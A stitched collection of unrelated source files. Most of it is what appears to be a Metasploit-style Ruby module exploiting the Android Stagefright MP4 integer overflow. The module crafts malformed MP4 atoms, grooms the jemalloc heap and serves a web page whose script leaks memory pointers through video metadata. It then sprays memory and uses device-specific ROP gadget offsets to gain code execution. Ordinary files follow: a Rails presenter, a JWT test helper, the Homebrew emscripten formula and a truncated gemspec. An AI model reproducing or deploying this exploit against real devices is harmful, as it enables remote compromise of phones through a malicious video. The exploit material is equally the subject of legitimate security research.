page[off+unalign_off,4] = [ new_sp2 ].pack('V')
else
page[off+unalign_off,4] = [ addr ].pack('V')
end
end
page
end
#
# MPEG-4 specific functionality
#
def get_atom(tag, data='', length=nil)
if tag.length != 4
raise 'Yo! They call it "FourCC" for a reason.'
end
length ||= data.length + 8
if length >= 2**32
return [ [ 1 ].pack('N'), tag, [ length ].pack('Q>'), data ].join
end
[ [ length ].pack('N'), tag, data ].join
end
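  # A worked layout example (values follow directly from the packing above):
  #   get_atom('ftyp', 'mp42') #=> "\x00\x00\x00\x0Cftypmp42" (12 = 8-byte header + 4 data bytes)
  # Lengths >= 2**32 switch to the 64-bit form: [1]['tag'][8-byte big-endian length][data].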
def get_stsc(num)
stsc_data = [ 0, num ].pack('N*') # version/flags, mNumSampleToChunkOffsets
stsc_data << [ 13+1, 0x5a5a5a5a, 37 ].pack('N*') * num
get_atom('stsc', stsc_data)
end
def get_ftyp
# Build the MP4 header...
ftyp = 'mp42'
ftyp << [ 0 ].pack('N')
ftyp << 'mp42'
ftyp << 'isom'
get_atom('ftyp', ftyp)
end
def get_pssh(alloc_size)
pssh_data = ''
pssh_data << [ 0 ].pack('N')
pssh_data << [ 0, 0, 0, 0 ].pack('N*')
pssh_data << [ alloc_size ].pack('N')
alloc_size.times do |off|
pssh_data << [ 0x55aa0000 + off ] .pack('V')
end
get_atom('pssh', pssh_data)
end
def get_metaitem(tag, type, data)
ret = ''
ret << tag.reverse
ret << type.reverse
case type
when 'in32'
ret << [ 4, data ].pack('V*')
when 'in64'
ret << [ 8, data ].pack('V*')
else
raise "How do you expect me to make a #{type.inspect} ??"
end
ret
end
def jemalloc_round(sz)
# These are in the 16-byte aligned runs
if (sz > 0x10 && sz <= 0x80)
round = 16
# 160 starts the 32-byte aligned runs
elsif (sz > 0x80 && sz <= 0x140)
round = 32
else
raise "Don't know how to round 0x%x" % sz
end
ret = (sz + (round - 1)) / round
ret *= round
return ret
end
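  # Worked examples for the two size classes above:
  #   jemalloc_round(0x78) #=> (0x78 + 15) / 16 * 16 = 0x80  (16-byte run)
  #   jemalloc_round(0x8c) #=> (0x8c + 31) / 32 * 32 = 0xa0  (32-byte run)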
#
# Leak data from mediaserver back to the browser!
#
# Stage 1 - leak a heap pointer near a SampleIterator object
# Stage 2 - read a code pointer from the SampleIterator object
#
def get_mp4_leak(my_target, peer)
# MPEG4 Fileformat Reference:
# http://qtra.apple.com/index.html
#
# Structure:
# [File type Chunk][Other Atom Chunks]
#
# Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
#
sampiter_alloc_size = 0x78
sampiter_alloc_size = my_target['SampleIteratorSize'] if not my_target['SampleIteratorSize'].nil?
sampiter_rounded = jemalloc_round(sampiter_alloc_size)
vector_alloc_size = 0x8c
vector_alloc_size = my_target['VectorSize'] if not my_target['VectorSize'].nil?
groom_count = 0x10
is_samsung = (my_target['Rop'] == 'sm-g900v / OE1')
# Coerce the heap into a favorable shape (fill holes)
shape_vector = get_pssh(vector_alloc_size)
# Allocate a block of memory of the correct size
placeholder = get_atom('titl', ('t' * 4) + ('titl' * (vector_alloc_size / 4)) + [ 0 ].pack('C'))
# Make the first tx3g chunk, which is meant to overflow into a MetaData array.
# We account for the overhead of both chunks here and aim for this layout:
#
# placeholder after re-allocation | vector array data
# <len><tag><padding><is-64bit><tag><len hi><len low> | <overflow data>
#
# Realistically, tx3g1_padding can be any number that rounds up to the
# correct size class.
tx3g1_overhead = 0x8
tx3g2_overhead = 0x10
tx3g_target = jemalloc_round(vector_alloc_size)
tx3g1_padding = tx3g_target - (tx3g1_overhead + tx3g2_overhead)
tx3g_data = 'x' * tx3g1_padding
tx3g_1 = get_atom('tx3g', tx3g_data)
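    # With the defaults above (vector_alloc_size = 0x8c): tx3g_target =
    # jemalloc_round(0x8c) = 0xa0, tx3g1_padding = 0xa0 - 0x18 = 0x88, so
    # tx3g_1 is a 0x90-byte atom (0x88 padding bytes plus the 8-byte header).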
# NOTE: hvcC added in 3b5a6b9fa6c6825a1d0b441429e2bb365b259827 (5.0.0 and later only)
# avcC was in the initial commit.
near_sampiter = get_atom('hvcC', "C" * sampiter_alloc_size)
# Craft the data that will overwrite the header and part of the MetaData
# array...
more_data = ''
more_data << [ 9, vector_alloc_size - 0x10, 0, 0 ].pack('V*')
# Now add the thing(s) we want to control (partially)
#
# We add some BS entries just to kill the real 'heig' and get proper
# ordering...
near_sampiter_addr = peer[:near_sampiter_addr]
if near_sampiter_addr.nil?
# Part 1. Leak the address of a chunk that should be adjacent to a
# SampleIterator object.
if is_samsung
# On Samsung:
# Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt
# After: dmcE, abc1, abc2, abc3, heig...
more_data << get_metaitem('dmcE', 'in32', 1)
more_data << get_metaitem('abc1', 'in32', 31335)
more_data << get_metaitem('abc2', 'in32', 31336)
end
# On Nexus:
# Before: heig, hvcc, inpS, mime, text, widt
# After: abc3, heig...
more_data << get_metaitem('abc3', 'in32', 31337)
# NOTE: We only use the first 12 bytes so that we don't overwrite the
# pointer that is already there!
heig = get_metaitem('heig', 'in32', 31338)
more_data << heig[0,12]
else
# Part 2. Read from the specified address, as with the original Metaphor
# exploit.
if is_samsung
# On Samsung:
# Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt
# After: dmcE, dura, ...
more_data << get_metaitem('dmcE', 'in32', 1)
else
# On Nexus:
# Before: avcc, heig, inpS, mime, text, widt
# After: dura, ...
near_sampiter = get_atom('avcC', "C" * sampiter_alloc_size)
end
# Try to read the mCurrentChunkSampleSizes vtable ptr within a
# SampleIterator object. This only works because the Vector is empty thus
# passing the restrictions imposed by the duration conversion.
ptr_to_vector_vtable = near_sampiter_addr - (sampiter_rounded * 2) + 0x30
more_data << get_metaitem('dura', 'in64', ptr_to_vector_vtable)
end
# The tx3g2 then needs to trigger the integer overflow, but can contain any
# contents. The overflow will terminate at the end of the file.
#
# NOTE: The second tx3g chunk's overhead ends up in the slack space between
# the replaced placeholder and the MetaData Vector contents.
big_num = 0x1ffffffff - tx3g_1.length + 1 + vector_alloc_size
tx3g_2 = get_atom('tx3g', more_data, big_num)
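    # The arithmetic that makes this work: the parser sums the two chunk
    # sizes, and tx3g_1.length + big_num == 0x200000000 + vector_alloc_size,
    # which truncates to just vector_alloc_size in 32 bits -- hence the
    # undersized temporary buffer that the copy then overflows.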
# Create a minimal, verified 'trak' to satisfy mLastTrack being set
stbl_data = get_stsc(1)
stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets
stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes
stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount
stbl = get_atom('stbl', stbl_data)
verified_trak = get_atom('trak', stbl)
# Start putting it all together into a track.
trak_data = ''
if is_samsung
# Put some legitimate duration information so we know if we failed
mdhd_data = [ 0 ].pack('N') # version
mdhd_data << "\x00" * 8 # padding
mdhd_data << [ 1 ].pack('N') # timescale
mdhd_data << [ 314 ].pack('N') # duration
mdhd_data << [ 0 ].pack('n') # lang
trak_data << get_atom('mdhd', mdhd_data)
end
# Add this so that our file is identified as video/mp4
mp4v_data = ''
mp4v_data << [ 0 ].pack('C') * 24 # padding
mp4v_data << [ 1024 ].pack('n') # width
mp4v_data << [ 768 ].pack('n') # height
mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length) # padding
trak_data << get_atom('mp4v', mp4v_data) # satisfy hasVideo = true
# Here, we cause allocations such that we can replace the placeholder...
if is_samsung
      trak_data << placeholder # Something we can free
trak_data << shape_vector # Eat the loose block...
trak_data << stbl # Cause the growth of the track->meta Vector
else
trak_data << stbl # Cause the growth of the track->meta Vector
      trak_data << placeholder # Something we can free
trak_data << shape_vector # Eat the loose block...
end
# Add the thing whose entry in the MetaData vector we want to overwrite...
trak_data << near_sampiter
# Get our overflow data into memory
trigger = ''
trigger << tx3g_1
    # Free the placeholder
trigger << get_atom('titl', ('t' * 4) + ('BBBB' * vector_alloc_size) + [ 0 ].pack('C'))
# Overflow the temporary buffer into the following MetaData array
trigger << tx3g_2
# !!! NOTE !!!
# On Samsung devices, the failure that causes ERR to be returned from
# 'tx3g' processing leads to "skipTrack" being set. This means our
# nasty track and it's metadata get deleted and not returned to the
# browser -- effectively killing the infoleak.
#
# However! It also handles "skipTrack" being set specially and does not
# immediately propagate the error to the caller. Instead, it returns OK.
    # This allows us to trigger the bug multiple times in one file, or --
# as we have in this case -- survive after and return successfully.
if is_samsung
# Add this as a nested track!
trak_data << get_atom('trak', trigger)
else
trak_data << trigger
end
trak = get_atom('trak', trak_data)
# On Samsung devices, we could put more chunks here but they will
# end up smashing the temporary buffer further...
chunks = []
chunks << get_ftyp()
chunks << get_atom('moov')
chunks << verified_trak * 0x200
chunks << shape_vector * groom_count
chunks << trak
mp4 = chunks.join
mp4
end
def get_mp4_rce(my_target, peer)
# MPEG4 Fileformat Reference:
# http://qtra.apple.com/index.html
#
# Structure:
# [File type Chunk][Other Atom Chunks]
#
# Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data]
#
chunks = []
chunks << get_ftyp()
# Note, this causes a few allocations
moov_data = ''
mvhd_data = [ 0, 0x41414141 ].pack('N*')
mvhd_data << 'B' * 0x5c
moov_data << get_atom('mvhd', mvhd_data)
# Add a minimal, verified 'trak' to satisfy mLastTrack being set
verified_trak = ''
stbl_data = get_stsc(0x28)
stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets
stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes
stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount
verified_trak << get_atom('trak', get_atom('stbl', stbl_data))
# Add it to the file
moov_data << verified_trak
# The spray_addr field is typically determined empirically (by testing), but
# has proven to be fairly predictable (99%). However, it does vary from
# one device to the next (probably determined by the pre-loaded libraries).
spray_addr = 0xb0c08000
spray_addr = my_target['SprayAddress'] if not my_target['SprayAddress'].nil?
# Construct a single page that we will spray
page = build_spray(my_target, peer, spray_addr)
return nil if page.nil?
# Build a big block full of spray pages and and put it in an avcC chunk
# (but don't add it to the 'moov' yet)
spray = page * (((16 * 1024 * 1024) / page.length) - 20)
avcc = get_atom('avcC', spray)
# Make the nasty trak
tkhd1 = ''
tkhd1 << [ 0 ].pack('C') # version
tkhd1 << 'D' * 3 # padding
tkhd1 << 'E' * (5*4) # {c,m}time, id, ??, duration
tkhd1 << 'F' * 0x10 # ??
tkhd1 << [
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0 # dy
].pack('N*')
tkhd1 << 'G' * 0x14 # ??
# Add the tkhd (track header) to the nasty track
trak1 = ''
trak1 << get_atom('tkhd', tkhd1)
# Build and add the 'mdia' (Media information) to the nasty track
mdia1 = ''
mdhd1 = [ 0 ].pack('C') # version
mdhd1 << 'D' * 0x17 # padding
mdia1 << get_atom('mdhd', mdhd1)
mdia1 << get_atom('hdlr', 'F' * 0x38) # Media handler
dinf1 = ''
dinf1 << get_atom('dref', 'H' * 0x14) # Data information box
minf1 = ''
minf1 << get_atom('smhd', 'G' * 0x08)
minf1 << get_atom('dinf', dinf1)
stbl1 = get_stsc(2)
minf1 << get_atom('stbl', stbl1)
mdia1 << get_atom('minf', minf1)
trak1 << get_atom('mdia', mdia1)
# Add something to take up a slot in the 0x20 size range
# NOTE: We have to be able to free this later...
block = 'Q' * 0x1c
trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block))
# Add a Track (hopefully right after)
trak1 << verified_trak
# Add the avcC chunk with the heap spray. We add it here so it's sure to be
# allocated when we get control of the program counter...
trak1 << avcc
# Build the first of the nasty pair of tx3g chunks that trigger the
# vulnerability
alloc_size = 0x20
overflow_size = 0xc0
overflow = [ spray_addr ].pack('V') * (overflow_size / 4)
tx3g_1 = get_atom('tx3g', overflow)
trak1 << tx3g_1
# Free the original thing and put the tx3g temporary in its place...
block = 'R' * 0x40
trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block))
# Make the second one, which triggers the integer overflow
big_num = 0x1ffffffff - 8 - overflow.length + 1 + alloc_size
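# NOTE: with overflow.length == 0xc0 and alloc_size == 0x20, big_num is
# 0x1ffffff58. The apparent intent: the parser adds the size of the
# previously stored 'tx3g' data (overflow.length + 8) to this 64-bit
# chunk size, giving 0x200000020 -- which truncates to exactly
# alloc_size (0x20) in a 32-bit size_t, so the copy that follows
# overflows the tiny allocation. (Our reading of the code, not a spec.)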
more_data = [ spray_addr ].pack('V') * (overflow_size / 4)
tx3g_2 = get_atom('tx3g', more_data, big_num)
trak1 << tx3g_2
# Add the nasty track to the moov data
moov_data << get_atom('trak', trak1)
# Finalize the moov chunk
moov = get_atom('moov', moov_data)
chunks << moov
# Combine outer chunks together and voila.
mp4 = chunks.join
mp4
end
def on_request_uri(cli, request)
# If the request is for an mp4 file, we need to get the target from the @peers hash
if request.uri =~ /\.mp4\?/i
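# Recover the per-peer filename: last path component, minus the query
# string and the trailing '.mp4'.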
mp4_fn = request.uri.split('/')[-1]
mp4_fn = mp4_fn.split('?')[0]
mp4_fn[-4,4] = ''
peer = @peers[mp4_fn]
my_target = nil
my_target = peer[:target] if peer
if my_target.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown peer")
return
end
# Extract the address(es) we just leaked...
sia_addr = request.qstring['sia'].to_i # near_sampiter data address
peer[:near_sampiter_addr] = sia_addr if sia_addr > 0
sfv_addr = request.qstring['sfv'].to_i # stagefright Vector<size_t> vtable ptr
peer[:vector_vtable_addr] = sfv_addr if sfv_addr > 0
# reset after a crash..
if sia_addr == 0 && sfv_addr == 0
peer[:near_sampiter_addr] = peer[:vector_vtable_addr] = nil
end
# Always use this header
out_hdrs = {'Content-Type'=>'video/mp4'}
if peer[:vector_vtable_addr].nil?
# Generate the nasty MP4 to leak infoz
mode = "infoleak"
mp4 = get_mp4_leak(my_target, peer)
else
mode = "RCE"
mp4 = get_mp4_rce(my_target, peer)
if mp4.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Failed to generate RCE MP4")
return
end
end
# Send the nasty MP4 file to trigger the vulnerability
if request.headers['Accept-Encoding'] and request.headers['Accept-Encoding'].include? 'gzip'
mp4 = Rex::Text.gzip(mp4)
out_hdrs.merge!('Content-Encoding' => 'gzip')
gzip = "gzip'd"
else
gzip = "raw"
end
client = "Browser"
if request.headers['User-Agent'].include? 'stagefright'
client = "SF"
end
addrs = "heap: 0x%x, code: 0x%x" % [ peer[:near_sampiter_addr].to_i, peer[:vector_vtable_addr].to_i ]
print_status("Sending #{mode} #{gzip} MPEG4 (#{mp4.length} bytes) to #{cli.peerhost}:#{cli.peerport}... (#{addrs} from #{client})")
# Send the nastiness!
send_response(cli, mp4, out_hdrs)
return
end
# Initialize a target. If none is suitable, we don't continue.
my_target = target
if my_target.name =~ /Automatic/
my_target = get_target(request)
if my_target.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown user-agent: #{request['User-Agent'].inspect}")
return
end
vprint_status("Target selected: #{my_target.name}")
end
# Generate an MP4 filename for this peer
mp4_fn = rand_text_alpha(11)
# Save the target for when they come back asking for this file
# Also initialize the leak address to the first one
@peers[mp4_fn] = { :target => my_target }
# Send the index page
mp4_uri = "#{get_resource.chomp('/')}/#{mp4_fn}.mp4"
html = %Q^<html>
<head>
<title>Please wait...</title>
<script>
var video; // the video tag
var to_id; // timeout ID
var req_start; // when we requested the video
var load_start; // when we loaded the video
// Give mediaserver some time to settle down after restarting -- increases reliability
var waitTime = 100; // bumped to 6000 below after a suspected crash
var error = false;
var near_sampiter_addr = -1;
var vector_vtable_addr = -1;
var crashes = 0;
function duration_changed() {
var now = Date.now();
var req_time = now - req_start;
var load_time = now - load_start;
console.log('duration changed to: ' + video.duration + ' (load: ' + load_time + ', req: ' + req_time + '), 0x' + video.videoWidth.toString(16) + ' x 0x' + video.videoHeight.toString(16));
if (load_time > 2000) {
// probably crashed. reset the entire process..
near_sampiter_addr = -1;
vector_vtable_addr = -1;
waitTime = 6000;
crashes += 1;
if (crashes > 5) {
console.log('too many crashes!!!');
stop_everything();
}
}
else {
// if we got the near_sampiter_addr already, we are now trying to read the code pointer.
// otherwise, we're trying to find near_sampiter_addr...
if (near_sampiter_addr == -1) {
// if we get this value, we failed to overwrite the metadata. try again.
if (video.videoHeight != 768) { // XXX: TODO: parameterize
if (video.videoHeight != 0) { // wtf? crashed??
value = video.videoHeight;
console.log('leaked heap pointer: 0x' + value.toString(16));
near_sampiter_addr = value;
}
}
} else if (vector_vtable_addr == -1) {
// if we get this value, we failed to overwrite the metadata. try again.
if (video.duration != 314) { // XXX: TODO: parameterize
// zero means a value that could not be represented...
if (video.duration != 0) {
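// The leaked 32-bit value comes back encoded as a duration in
// seconds; scaling by 1e6 (presumably the media timescale)
// recovers the raw integer.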
var value = Math.round(video.duration * 1000000);
console.log('leaked memory: ' + video.duration + ' (near_sampiter_addr: 0x' + near_sampiter_addr.toString(16) + '): 0x' + value.toString(16));
vector_vtable_addr = value;
}
}
}
// otherwise, we just keep trying with the data we have...
}
if (error == false) {
if (vector_vtable_addr == -1) {
to_id = setTimeout(reload_leak, waitTime);
} else {
to_id = setTimeout(reload_rce, waitTime);
}
waitTime = 100;
}
}
function stop_everything() {
if (error == false) {
console.log('---- GIVING UP!! ----');
error = true;
}
if (to_id != -1) {
clearTimeout(to_id);
}
}
function start() {
video = document.getElementById('vid');
video.onerror = function() {
console.log(' onError called!');
stop_everything();
}
video.ondurationchange = duration_changed;
//reload_rce();
reload_leak();
}
function get_uri() {
var rn = Math.floor(Math.random() * (0xffffffff - 1)) + 1;
var uri = '#{mp4_uri}?x=' + rn;
if (near_sampiter_addr != -1) {
uri += '&sia=' + near_sampiter_addr;
}
if (vector_vtable_addr != -1) {
uri += '&sfv=' + vector_vtable_addr;
}
return uri;
}
function reload_leak() {
to_id = -1;
var xhr = new XMLHttpRequest;
xhr.responseType = 'blob';
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if (xhr.status != 200 || !xhr.response) {
stop_everything();
return;
}
load_start = Date.now();
try {
//var url = URL.createObjectURL(xhr.response);
var a = new FileReader();
a.onload = function(e) {
//console.log('onload: ' + e.target.result);
video.src = e.target.result
};
a.onerror = function(e) { console.log('blob 2 data error: ' + e.error); }
a.readAsDataURL(xhr.response);
} catch(e) {
console.log(' ERROR: ' + e.message);
stop_everything();
}
}
};
xhr.open('GET', get_uri(), true);
req_start = Date.now();
xhr.send();
}
function reload_rce() {
to_id = -1;
video.src = get_uri();
}
</script></head>
<body onload='start()'>
<video id=vid width=1px controls>
Your browser does not support VIDEO tags.
</video><br />
Please wait while we locate your content...
</body>
</html>
^
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
#
# Return some firmware-specific values to the caller.
#
# The VectorRVA field is extracted using the following command:
#
# $ arm-eabi-readelf -a libstagefright.so | grep _ZTVN7android6VectorIjEE
#
def get_details(my_target)
details = {
'lrx' => {
'VectorRVA' => 0x10ae30,
'PivotStrategy' => 'lrx',
'Pivot1' => 0x67f7b, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1
'Pivot2' => 0xaf9dd, # ldm.w r4, {sp} ; pop {r3, pc}
'Adjust' => 0x475cd # pop {r3, r4, pc}
},
'lmy-1' => {
'VectorRVA' => 0x10bd58,
'PivotStrategy' => 'lmy-1',
'Pivot1' => 0x68783, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1
'Pivot2' => 0x81959, # ldm.w r4, {r1, ip, sp, pc}
'Adjust' => 0x479b1 # pop {r3, r4, pc}
},
'lmy-2' => {
'VectorRVA' => 0x10bd58,
'PivotStrategy' => 'lmy-2',
'Pivot1' => 0x6f093, # ldr r0, [r0, #0x10] ; ldr r3, [r0] ; ldr r1, [r3, #0x18] ; blx r1
'Pivot2' => 0x81921, # ldm.w r0!, {r1, ip, sp, pc}
'Adjust' => 0x479b1 # pop {r3, r4, pc}
},
'shamu / LYZ28E' => {
'VectorRVA' => 0x116d58,
'PivotStrategy' => 'lyz',
'Pivot1' => 0x91e91, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3
'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc}
'Adjust' => 0x44f81 # pop {r3, r4, pc}
},
'shamu / LYZ28J' => {
'VectorRVA' => 0x116d58,
'PivotStrategy' => 'lyz',
'Pivot1' => 0x91e49, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3
'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc}
'Adjust' => 0x44f81 # pop {r3, r4, pc}
},
'sm-g900v / OE1' => {
'VectorRVA' => 0x174048,
'PivotStrategy' => 'sm-g900v',
'Pivot1' => 0x89f83, # ldr r4, [r0] ; ldr r5, [r4, #0x20] ; blx r5
'Pivot2' => 0xb813f, # ldm.w r4!, {r5, r7, r8, fp, sp, lr} ; cbz r0, #0xb8158 ; ldr r1, [r0] ; ldr r2, [r1, #4] ; blx r2
'Adjust' => 0x65421 # pop {r4, r5, pc}
}
}
details[my_target['Rop']]
end
end
| 33.283237 | 189 | 0.547909 |
1ad8b4e50cf65f362bf329f155b812f2408a5d2a | 563 | # frozen_string_literal: true
class StatementPresenter < SimpleDelegator
include Rails.application.routes.url_helpers
def self.wrap(statements)
statements.map { |statement| new(statement) }
end
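# Example (hypothetical caller):
#
#   statements = StatementPresenter.wrap(account.statements)
#   statements.first.download_path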
def download_path
facility_account_statement_path(facility, account, id, format: :pdf)
end
def order_count
order_details.count
end
def sent_at
I18n.l(created_at, format: :usa)
end
def sent_by
User.find(created_by).full_name
rescue ActiveRecord::RecordNotFound
I18n.t("statements.show.created_by.unknown")
end
end
| 18.766667 | 72 | 0.746004 |
91bd9726b79be38d7ed6d6d004090cf3cdfdb3a9 | 1,001 | # encoding: UTF-8
# frozen_string_literal: true
Bundler.require
Test::Unit::TestCase.test_order = :random
require "active_support/inflections"
require "active_support/core_ext/kernel/reporting"
require "securerandom"
require "openssl"
require "base64"
require "set"
ActiveSupport::Inflector.inflections do |inflect|
inflect.acronym "API"
inflect.acronym "v1"
inflect.acronym "v2"
end
module MyAPIv1
class JWTAuthenticator < JWT::Authenticator
end
end
ENV["MY_API_V2_JWT_ISS"] = "foo"
ENV["MY_API_V2_JWT_AUD"] = "foo,bar,baz"
ENV["MY_API_V2_JWT_SUB"] = "session"
ENV["MY_API_V2_JWT_ALG"] = "RS256"
ENV["MY_API_V2_JWT_KEY"] = Base64.urlsafe_encode64(OpenSSL::PKey::RSA.generate(2048).to_pem)
module MyAPIv2
class JWTAuthenticator < JWT::Authenticator
private
def public_key(*)
OpenSSL::PKey.read(Base64.urlsafe_decode64(ENV["MY_API_V2_JWT_KEY"])).public_key
end
end
end
module MyAPI
module V3
class JWTAuthenticator < JWT::Authenticator
end
end
end
| 19.627451 | 92 | 0.753247 |
1aab1358e9cb3426fa7b290ada5e7993ccc2a329 | 6,911 | require "language/node"
class Emscripten < Formula
desc "LLVM bytecode to JavaScript compiler"
homepage "https://emscripten.org/"
url "https://github.com/emscripten-core/emscripten/archive/2.0.32.tar.gz"
sha256 "c0ba34094ddf69ab7f24164c657a816d7256142a58f5e93aa74987d25945287b"
license all_of: [
"Apache-2.0", # binaryen
"Apache-2.0" => { with: "LLVM-exception" }, # llvm
any_of: ["MIT", "NCSA"], # emscripten
]
head "https://github.com/emscripten-core/emscripten.git"
livecheck do
url :stable
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
sha256 cellar: :any, arm64_monterey: "8e6c7a3c8eb5d37c4c3910aad2e1c60e7b4936c15190c653080d85ff43197e3b"
sha256 cellar: :any, arm64_big_sur: "ffcfe2eaec015ece0df30c21a13da5c4d4a39f832c62f34ad5d61d181d7cd5cd"
sha256 cellar: :any, monterey: "69573c8cc9e3bbb80bb29cd6b0ffcd66c6ca3bcb6f3d7986d963bc0a1233b553"
sha256 cellar: :any, big_sur: "c22c85d9f3504f914e80a5d24a2aa5e5e2b954988320878aa09d1adc1b99dc3f"
sha256 cellar: :any, catalina: "25c29d35b9d637111d8f394713c0cd764421a147088bdae3aa64017dcd721293"
sha256 cellar: :any, mojave: "06e083841d95c745a3be928a1ed08aedf83238109de60fabbbc5932083757106"
sha256 cellar: :any_skip_relocation, x86_64_linux: "0a34435dca7a88bcaeef77cbff59cb892466acb456507bd2f9b7147f45c74ddd"
end
depends_on "cmake" => :build
depends_on "node"
depends_on "[email protected]"
depends_on "yuicompressor"
# OpenJDK is needed as a dependency on Linux and ARM64 for google-closure-compiler,
# an emscripten dependency, because the native GraalVM image will not work.
on_macos do
depends_on "openjdk" if Hardware::CPU.arm?
end
on_linux do
depends_on "gcc"
depends_on "openjdk"
end
fails_with gcc: "5"
# Use emscripten's recommended binaryen revision to avoid build failures.
# See llvm resource below for instructions on how to update this.
resource "binaryen" do
url "https://github.com/WebAssembly/binaryen.git",
revision: "c19ff59c71824b34fa312aac9ad979e2198d7d36"
end
# emscripten needs argument '-fignore-exceptions', which is only available in llvm >= 12
# To find the correct llvm revision, find a corresponding commit at:
# https://github.com/emscripten-core/emsdk/blob/main/emscripten-releases-tags.json
# Then take this commit and go to:
# https://chromium.googlesource.com/emscripten-releases/+/<commit>/DEPS
# Then use the listed llvm_project_revision for the resource below.
resource "llvm" do
url "https://github.com/llvm/llvm-project.git",
revision: "9403514e764950a0dfcd627fc90c73432314bced"
end
def install
ENV.cxx11
# All files from the repository are required as emscripten is a collection
# of scripts which need to be installed in the same layout as in the Git
# repository.
libexec.install Dir["*"]
# emscripten needs an llvm build with the following executables:
# https://github.com/emscripten-core/emscripten/blob/#{version}/docs/packaging.md#dependencies
resource("llvm").stage do
projects = %w[
clang
lld
]
targets = %w[
host
WebAssembly
]
llvmpath = Pathname.pwd/"llvm"
# Apple's libstdc++ is too old to build LLVM
ENV.libcxx if ENV.compiler == :clang
# compiler-rt has some iOS simulator features that require i386 symbols
# I'm assuming the rest of clang needs support too for 32-bit compilation
# to work correctly, but if not, perhaps universal binaries could be
# limited to compiler-rt. llvm makes this somewhat easier because compiler-rt
# can almost be treated as an entirely different build from llvm.
ENV.permit_arch_flags
args = std_cmake_args.reject { |s| s["CMAKE_INSTALL_PREFIX"] } + %W[
-DCMAKE_INSTALL_PREFIX=#{libexec}/llvm
-DLLVM_ENABLE_PROJECTS=#{projects.join(";")}
-DLLVM_TARGETS_TO_BUILD=#{targets.join(";")}
-DLLVM_LINK_LLVM_DYLIB=ON
-DLLVM_BUILD_LLVM_DYLIB=ON
-DLLVM_INCLUDE_EXAMPLES=OFF
-DLLVM_INCLUDE_TESTS=OFF
-DLLVM_INSTALL_UTILS=OFF
]
sdk = MacOS.sdk_path_if_needed
args << "-DDEFAULT_SYSROOT=#{sdk}" if sdk
if MacOS.version == :mojave && MacOS::CLT.installed?
# Mojave CLT linker via software update is older than Xcode.
# Use it to retain compatibility.
args << "-DCMAKE_LINKER=/Library/Developer/CommandLineTools/usr/bin/ld"
end
mkdir llvmpath/"build" do
# We can use `make` and `make install` here, but prefer these commands
# for consistency with the llvm formula.
system "cmake", "-G", "Unix Makefiles", "..", *args
system "cmake", "--build", "."
system "cmake", "--build", ".", "--target", "install"
end
end
resource("binaryen").stage do
args = std_cmake_args.reject { |s| s["CMAKE_INSTALL_PREFIX"] } + %W[
-DCMAKE_INSTALL_PREFIX=#{libexec}/binaryen
]
system "cmake", ".", *args
system "make", "install"
end
cd libexec do
system "npm", "install", *Language::Node.local_npm_install_args
rm_f "node_modules/ws/builderror.log" # Avoid references to Homebrew shims
# Delete native GraalVM image in incompatible platforms.
if OS.linux?
rm_rf "node_modules/google-closure-compiler-linux"
elsif Hardware::CPU.arm?
rm_rf "node_modules/google-closure-compiler-osx"
end
end
# Add JAVA_HOME to env_script on ARM64 macOS and Linux, so that google-closure-compiler
# can find OpenJDK
emscript_env = { PYTHON: Formula["[email protected]"].opt_bin/"python3" }
emscript_env.merge! Language::Java.overridable_java_home_env if OS.linux? || Hardware::CPU.arm?
%w[em++ em-config emar emcc emcmake emconfigure emlink.py emmake
emranlib emrun emscons].each do |emscript|
(bin/emscript).write_env_script libexec/emscript, emscript_env
end
end
def post_install
system bin/"emcc", "--check"
if File.exist?(libexec/".emscripten") && !File.exist?(libexec/".homebrew")
touch libexec/".homebrew"
inreplace "#{libexec}/.emscripten" do |s|
s.gsub!(/^(LLVM_ROOT.*)/, "#\\1\nLLVM_ROOT = \"#{opt_libexec}/llvm/bin\"")
s.gsub!(/^(BINARYEN_ROOT.*)/, "#\\1\nBINARYEN_ROOT = \"#{opt_libexec}/binaryen\"")
end
end
end
test do
# Fixes "Unsupported architecture" Xcode prepocessor error
ENV.delete "CPATH"
(testpath/"test.c").write <<~EOS
#include <stdio.h>
int main()
{
printf("Hello World!");
return 0;
}
EOS
system bin/"emcc", "test.c", "-o", "test.js", "-s", "NO_EXIT_RUNTIME=0"
assert_equal "Hello World!", shell_output("node test.js").chomp
end
end
| 36.957219 | 123 | 0.67313 |
9184945d3188eacdfe8c548d16b21622e5cc91e8 | 1,301 | # -*- encoding: utf-8 -*-
require File.expand_path('../lib/rollbar/version', __FILE__)
Gem::Specification.new do |gem|
